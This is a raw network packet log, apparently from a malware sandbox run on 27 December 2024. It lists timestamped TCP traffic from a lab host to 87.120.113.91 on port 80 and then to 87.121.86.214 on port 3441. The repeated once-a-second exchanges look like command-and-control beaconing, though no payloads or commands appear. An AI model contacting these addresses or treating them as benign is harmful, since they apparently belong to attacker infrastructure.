                                                        Dec 27, 2024 14:53:47.200923920 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.201574087 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.201613903 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.201689959 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.202402115 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.202430964 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.202440977 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.203214884 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.203254938 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.203326941 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.204022884 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.204062939 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.204132080 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.204874039 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.204906940 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.204919100 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.205661058 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.205713987 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.205854893 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.206485033 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.206526995 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.206588984 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.207262039 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.207299948 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.207362890 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.208110094 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.208143950 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.208230019 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.208946943 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.208987951 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.209026098 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.209733009 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.209770918 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.209835052 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.210542917 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.210587025 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.210658073 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.211384058 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.211415052 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.211430073 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.212192059 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.212235928 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.212297916 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.213012934 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.213053942 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.213113070 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.213833094 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.213884115 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.213933945 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.214642048 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.214683056 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.214736938 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.215488911 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.215524912 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.215568066 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.216301918 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.216348886 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.216373920 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.217107058 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.217180014 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.217200041 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.217890024 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.217936039 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.218025923 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.218715906 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.218760967 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.218842983 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.219590902 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.219635010 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.219666958 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.220343113 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.220391989 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.220395088 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.271943092 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.287388086 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.287408113 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.287473917 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.287698984 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.287772894 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.287811995 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.288525105 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.288634062 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.288676977 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.289345980 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.289475918 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.289513111 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.290172100 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.290285110 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.290323973 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.291100979 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.291296005 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.291342020 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.292121887 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.292207956 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.292251110 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.292927027 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.292992115 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.293035030 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.293701887 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.293773890 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.293812990 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.294285059 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.294357061 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.294398069 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.295079947 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.295140028 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.295181036 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.295922041 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.296005964 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.296042919 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.296679020 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.296833038 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.296869993 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.297493935 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.297622919 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.297662973 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.298341990 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.298432112 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.298475027 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.299144030 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.299248934 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.299290895 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.299984932 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.300082922 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.300123930 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.300789118 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.300863028 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.300899982 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.301595926 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.301695108 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.301736116 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.302428961 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.302608013 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.302655935 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.303211927 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.303356886 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.303397894 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.304099083 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.304179907 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.304219961 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.304891109 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.304903984 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.304948092 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.305655003 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.350074053 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.386838913 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.386934042 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.386985064 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.387157917 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.387346983 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.387381077 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.387964964 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.388046026 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:47.388098001 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:47.832220078 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:55.939840078 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:53:56.059576988 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:53:56.059657097 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:53:56.060847044 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:53:56.180289030 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:53:57.357928038 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:53:57.358103991 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:53:57.477720976 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:53:57.768574953 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:53:57.768740892 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:53:57.888597012 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:53:57.888657093 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:53:58.008426905 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:53:58.295469999 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:53:58.295619011 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:53:58.415146112 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:53:58.415246010 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:53:58.535083055 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:53:58.821348906 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:53:58.865771055 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:53:59.022408009 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:53:59.039114952 CET497683441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:53:59.068837881 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:53:59.158746958 CET34414976887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:53:59.158827066 CET497683441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:53:59.159332991 CET497683441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:53:59.278809071 CET34414976887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:53:59.383265018 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:53:59.428200960 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:00.382304907 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:00.428190947 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:00.451778889 CET34414976887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:00.451932907 CET497683441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:00.571433067 CET34414976887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:00.855496883 CET34414976887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:00.856395006 CET497743441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:00.896945953 CET497683441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:00.976041079 CET34414977487.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:00.976154089 CET497743441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:00.976299047 CET497743441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:01.095921993 CET34414977487.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:01.382509947 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:01.428188086 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:02.314126015 CET34414977487.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:02.316412926 CET497743441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:02.388334036 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:02.435920954 CET34414977487.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:02.443814993 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:02.733211994 CET34414977487.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:02.734051943 CET497793441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:02.787590027 CET497743441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:02.853521109 CET34414977987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:02.853598118 CET497793441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:02.853812933 CET497793441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:02.973453045 CET34414977987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:03.389838934 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:03.443813086 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:04.145385981 CET34414977987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:04.145761013 CET497793441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:04.265755892 CET34414977987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:04.418724060 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:04.459445953 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:04.551625967 CET34414977987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:04.569757938 CET497843441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:04.600070000 CET497793441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:04.689308882 CET34414978487.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:04.689439058 CET497843441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:04.730431080 CET497843441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:04.850018024 CET34414978487.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:05.419675112 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:05.475060940 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:06.022808075 CET34414978487.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:06.022989035 CET497843441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:06.142628908 CET34414978487.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:06.421369076 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:06.421962976 CET34414978487.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:06.422616005 CET497893441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:06.475071907 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:06.475179911 CET497843441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:06.542181015 CET34414978987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:06.542248011 CET497893441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:06.542515039 CET497893441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:06.662076950 CET34414978987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:07.420778990 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:07.475188017 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:07.834367037 CET34414978987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:07.834537029 CET497893441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:07.954029083 CET34414978987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:08.238879919 CET34414978987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:08.287580967 CET497893441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:08.422314882 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:08.475075006 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:09.423396111 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:09.475140095 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:10.433140993 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:10.476669073 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:11.436984062 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:11.490715027 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:12.439635038 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:12.490750074 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:13.440757036 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:13.490745068 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:14.443386078 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:14.490690947 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:15.442853928 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:15.490691900 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:16.443490028 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:16.490794897 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:17.444561005 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:17.490708113 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:18.446180105 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:18.490696907 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:19.446557045 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:19.490719080 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:20.450261116 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:20.490701914 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:21.452558994 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:21.506316900 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:22.455410004 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:22.506309986 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:23.646387100 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:23.693867922 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:24.630789995 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:24.678217888 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:25.632757902 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:25.678215981 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:26.854007959 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:26.897012949 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:27.838320017 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:27.896936893 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:28.836604118 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:28.901365995 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:29.837308884 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:29.881359100 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:30.912703037 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:30.959486961 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:31.914026022 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:31.959510088 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:32.914506912 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:32.959486008 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:33.995378971 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:34.037575960 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:34.995563030 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:35.037643909 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:35.996404886 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:36.037727118 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:36.997421980 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:37.037606955 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:37.998898983 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:38.053210020 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:38.999216080 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:39.053201914 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:40.002995968 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:40.053246021 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:41.002983093 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:41.053349972 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:42.002551079 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:42.053191900 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:43.003829002 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:43.053209066 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:44.004404068 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:44.053323030 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:45.005881071 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:45.053235054 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:45.647182941 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:45.647248983 CET497683441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:45.647281885 CET497743441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:45.647300005 CET497793441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:45.647351980 CET497843441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:45.647358894 CET497893441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:45.767254114 CET34414976287.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:45.767452955 CET497623441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:45.768018961 CET34414976887.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:45.768057108 CET34414977987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:45.768079042 CET497683441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:45.768095970 CET34414977487.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:45.768107891 CET34414978987.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:45.768115997 CET497793441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:45.768158913 CET497743441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:45.768167973 CET497893441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:45.768172026 CET34414978487.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:45.768227100 CET497843441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:49.849509954 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:49.969163895 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:49.969264984 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:49.969424009 CET498803441192.168.2.1087.121.86.214
                                                        Dec 27, 2024 14:54:50.088830948 CET34414988087.121.86.214192.168.2.10
                                                        Dec 27, 2024 14:54:51.216526985 CET34414988087.121.86.214192.168.2.10
